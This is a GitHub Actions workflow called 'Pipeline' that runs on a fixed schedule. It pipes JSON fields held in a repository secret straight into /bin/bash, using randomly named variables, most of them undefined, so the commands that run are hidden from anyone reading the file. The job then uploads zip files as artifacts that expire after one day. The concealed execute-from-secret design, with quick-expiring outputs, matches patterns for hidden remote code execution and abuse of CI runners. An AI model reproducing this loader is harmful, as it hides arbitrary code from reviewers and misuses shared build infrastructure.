name: Pipeline
on:
  workflow_dispatch:

  schedule:
    - cron: '5 1,7,13,19 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  action:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Begin
        env:
          x50379: ${{ secrets.x50379 }}
        run: |
          printf '%s' "$x50379" | jq -r .uqjg30469 | /bin/bash
          echo $bmun65673 | jq -r .b4 | /bin/bash
          printf '%s' "$orx4159" | jq -r .mdn8 | /bin/bash
          printf '%s' "$nrqi52847" | jq -r .sgj72 | /bin/bash
          echo $c109 | jq -r .mfom6744 | /bin/bash
          printf '%s' "$sfdl367" | jq -r .mqkc902 | /bin/bash
          printf '%s' "$oir2608" | jq -r .redjr66 | /bin/bash
          echo $pobg19 | jq -r .v65582 | /bin/bash
          printf '%s' "$dy0" | jq -r .fmme448 | /bin/bash
          printf '%s' "$ueufp7" | jq -r .dt579 | /bin/bash

      - name: Save results
        uses: actions/upload-artifact@v4
        with:
          name: 813oHKpc
          path: "*.zip"
          retention-days: 1
